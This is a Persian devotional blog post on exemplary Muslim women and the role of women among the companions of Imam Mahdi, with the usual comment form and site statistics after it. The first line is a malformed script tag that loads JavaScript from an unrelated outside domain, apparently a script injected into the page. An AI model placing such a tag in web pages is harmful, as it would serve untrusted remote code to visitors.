script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> زنان نمونه یاوران امام زمان (عج) .
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند

مقدمه

آفرينشِ زن، برگ زريني از کتاب خلقت است. زيرا زن يکي از مظاهرِ زيبايي و بزرگي خداوند است. زنان! نيمي از اجتماع را تشکيل مي دهند و نقش مهمي در رشد و پيشرفت جامعه دارند.
در نظام خلقت همانطور که دين اسلام اشاره کرده، خداوند زن و مرد را جداگانه خلق نمود و از روح خود بر آنها دميد.
زرارة‌ بن اعين از امام صادق عليه السلام نقل مي­کند که:
« خداوند بعد از آفرينش آدم، حوا را به طور نو ظهور پديد آورد...».[1]

پس معلوم مي شود از نظر خلقت، فرقي بين زن و مرد نبوده و هيچ کدام امتيازي بر ديگري ندارند. و انسانها به واسطه سعي و تلاش خودشان، مي­توانند به مراتب بالاي کمال در زمينه­هاي علمي و اخلاقي برسند و در اين راه هيچ فرقي ميان زن و مرد نمي ­باشد.در قرآن مي خوانيم:
«اي مردم ما شما را از يک مرد و زن آفريديم و شما را در قالب تيره ها و قبيله ها قرار داديم تا يکديگر را بشناسيد، (اينها ملاک امتياز نيست) گرامي ترين شما نزد خداوند با تقواترين شماست...»
ما در اين نوشتار كه در دو فصل مي آيد؛ به دنبال تبيين حضور زنان در حكومت مهدي  عجل الله تعالي فرجه الشريف  و ذكر نمونه هايي از اين حضور تا به لطف الهي زنان ما به عنوان  ياران و منتظران حضرت مهدي  عجل الله تعالي فرجه الشريف هم به اعتلاي خود بپردازند و هم تربيت كننده نسل منتظر و ياور  حضرت مهدي عجل الله تعالي فرجه الشريف باشند.
1. زنان در قرآن
قرآن، جداي از اينكه تقواي الهي و پيمودن درجات كمال انساني را منحصر به مردان نمي داند، در مواردِ  متفاوتي از زنان نمونه­اي نام مي برد كه الگوي مردان و زنان مومن اند و ما در اينجا به بعضي از آنها اشاره مي كنيم :
الف. آسيه همسر فرعون
اين زن با اينکه در بهترين شرايط مادي و زندگي دنيايي به سر مي­برد با دعوت حضرت موسي، ايمان آورد و تا پاي جان در زير سخت­ترين شکنجه­ها دست از ايمان و عقيدة خود بر نداشت و به چنان مقام بالايي رسيد که خداوند او را الگوي تمام زنان و مردان مؤمن معرفي مي­کند. وي از جمله چهار زني مي باشد که بهشت مشتاق آنهاست.[2]
ب. حضرت مريم
در فضيلت اين بانو همين بس که خداوند سوره­اي از قرآن را به نام اين بانو قرار داده است و در جاي جاي قرآن تعبيرهاي زيبايي درباره حضرت مريم آمده است که هر فردي را به شگفتي مي­اندازد.
ج. مادر و خواهر حضرت موسي
اين دو زن نقش مهمي در حفظ جان حضرت موسي  عليه السلام داشتند به طوري که مادر آن حضرت او را درجعبه اي قير اندود قرار داده و در رود نيل مي­اندازد و خواهرش او را تا کاخ فرعون تعقيب کرده و سبب بازگرداندن حضرت موسي به آغوش مادرش مي­شود.
2. نقش زنان در عرصه هاي گوناگون
تاريخ شاهد است که زنان نه تنها در بعد فردي و معنوي به درجات بالاي کمال رسيده اند بلكه در بعد اجتماعي هم نقش فعالي داشتند.
عرصه هاي سياسي، ميدان جنگ و نبرد و علمي شاهد حضور و نقش زنان مي باشد.
الف. در عرصه سياسي
نقش زنان مؤمن در حفظ اسلام و دفاع از پيشواي مسلمانان در عصر و زمان خودشان چشمگير و حائز اهيمت است. تاريخ، نمونه زيادي از اين زنان در خود دارد که ما به تعدادي از آنها اشاره مي­كنيم.
حضرت زهرا عليها السلام
اين بانوي گرامي داراي ابعاد وجودي بسياري است که هر بُعد زندگي آن حضرت سرمشق ديگران است. آن حضرت نه تنها داراي مقام عصمت بوده، داراي  مقامات بالاي معنوي نيز بودند چنانچه امام حسن مجتبي عليه السلام مي فرمايد:
« عابدتر از فاطمه در دنيا نمي­توان يافت»[3]
حضرت فاطمه عليها السلام  هم خانه­دار خوبي بودند و سنگر خانه را مهمتر از هر چيز ديگر مي­دانستند و هم سياستمداري آگاه بودند که به مقتضاي زمان و مصلحت جامعه عمل مي­کردند. آن حضرت در خانه همسر خوبي براي علي عليه السلام و مادري موفق در تربيت فرزندان صالح خويش بودند و در بيرون منزل مدافع فداکاري براي مکتب اسلام بودند چنانچه در دفاع از وصي پيامبر آنهم نه به عنوان اينکه اميرالمؤمنين  عليه السلام  شوهر آن حضرت بود بلکه به عنوان دفاع از امامت و امام  زمان  خويش خطبه ­خواندند و فرياد ­زدند. ايشان شبها به خانه انصار و مهاجران مي رفتند و با آنها حرف مي­زدند و فضايل علي عليه السلام را يکي يکي مي­شمردند و سفارش­هاي پيامبر را در غدير به ياد آنها مي­آوردند و با قدرت منطق و استدلال، حقانيت آن حضرت را اثبات مي­کردند و عاقبت نيز در راه دفاع از ولايت و امامت به شهادت رسيدند.
حضرت زينب عليها السلام 
حضرت زينب هم که در دامان چنين مادري پرورش يافت الگوي صبر و استقامت است. مصائب آن حضرت در واقعۀ کربلا و نقش آن بانو بعد از واقعۀ کربلا در افشاگري و رسوايي يزيد و يارانش بر کسي پوشيده نيست و اگر شجاعت و فداکاري حضرت زينب(س) نبود دشمنان ياد کربلا را از بين مي بردند و امام سجاد عليه السلام را به شهادت مي­رساندند و اثري از اسلام عزيز باقي نمي­ماند.
كربلا مي­مرد اگر زينب نبود                     شيعه مي­پژمرد اگر زينب نبود
حضرت خديجه عليها السلام 
از حضرت خديجه عليها السلام  نيز به عنوان يكي از  چهار زن آسماني و بهشتي نام برده­اند كه در عرصه سياسي اولين زن مومنه و ياريگر پيامبر گرامي اسلام صل الله عليه و آله  بوده است و نقش مهمي در پيشبرد اسلام داشته است.
بنت الهدي صدر:
از زنان عصر حاضر نيز مي توان به بنت الهدي صدر اشاره کنيم. وي پرچمدار حرکت اسلامي بانوان در عراق بود. ايشان پس از دستگيري برادرش آيت الله صدر با سخنراني روشنگرانه حرکت جديدي را آغاز کرد که آزادي برادرش را در پي داشت اما پس از چند ماه او و برادرش را دستگير و به شهادت رساندند.
در طول مبارزات ملت ايران براي پيروزي انقلاب اسلامي و جنگ تحميلي نيز ما زنان بسياري داشتيم که نقش مهمي را ايفا کردند.
ج. در ميدان جنگ و نبرد
در صدر اسلام عده زيادي از زنان به همراه پيامبر در صحنه نبرد شرکت مي­کردند و به مداواي مجروحان و سرپرستي بيماران مي­پرداختند و در انتقال آب و حمل غذا و آشپزي و نگهداري وسايل رزمندگان و تهيه دارو و رساندن مهمات به رزمندگان و تعمير تجهيزات آسيب ديده وانتقال مجروحان و شهدا انجام وظيفه مي­کردند.
براي نمونه مي‌توان از نسيه دختر کعب مازينه اين بانوي گرامي مادر دو شهيد است و از زنان قهرماني است که در برخي از جنگهاي پيامبر صل الله عليه و آله  حضور فعالي براي مداواي مجروحان داشته است. او در جنگ احد پس از شکست مسلمانان با شمشير به دفاع از پيامبر صل الله عليه و آله  پرداخت و حضرت رسول نيز در مورد او دعا کردند که خدا او را از اهل بهشت قرار دهد.
فصل دوم: زنان در حکومت امام زمان عليه السلام
همانطور که زنان در تاريخِ حماسه­ها و قيام­ها نقش چشمگيري داشتند و پيام آور حضورِ توأم با عزّت و عفّت بوده­اند در حکومت جهاني حضرت مهدي عليه السلام نيز در جهت گسترش فرهنگ اسلامي و تبيين خطوط اصلي دين و آموزش معارف الهي نقش­ برجسته­اي برعهده دارند.
وجود 50 زن از ميان 313 نفر از ياران برجسته و فرماندهان آن حضرت مؤيد اين مطلب است.
امام باقر  عليه السلام مي فرمايد:
« به خدا سوگند 313 نفر بدون وعده پيشين گرد مي آيند. در ميان آنها 50 نفر زن هستند»
يا در جاي ديگر امام صادق  عليه السلام  نيز از زنان همراه حضرت مهدي عليه السلام  نام برده و  مي فرمايد:
« آنان مجروحان را مداوا مي­کنند و از بيماران جنگي پرستاري مي­نمايند چنانچه زنان در زمان پيامبر همراه او بودند....»[4]
اين دو روايت حکايت از آن دارد که وجود زنان در بين ياران حضرت امري حتمي است.
حال جا دارد بر اساس روايات حضور و نقش اين زنان را از نظر زمان و موقعيت بررسي کنيم.



نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 6
بازدید دیروز : 0
بازدید هفته : 161
بازدید ماه : 254
بازدید کل : 33023
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1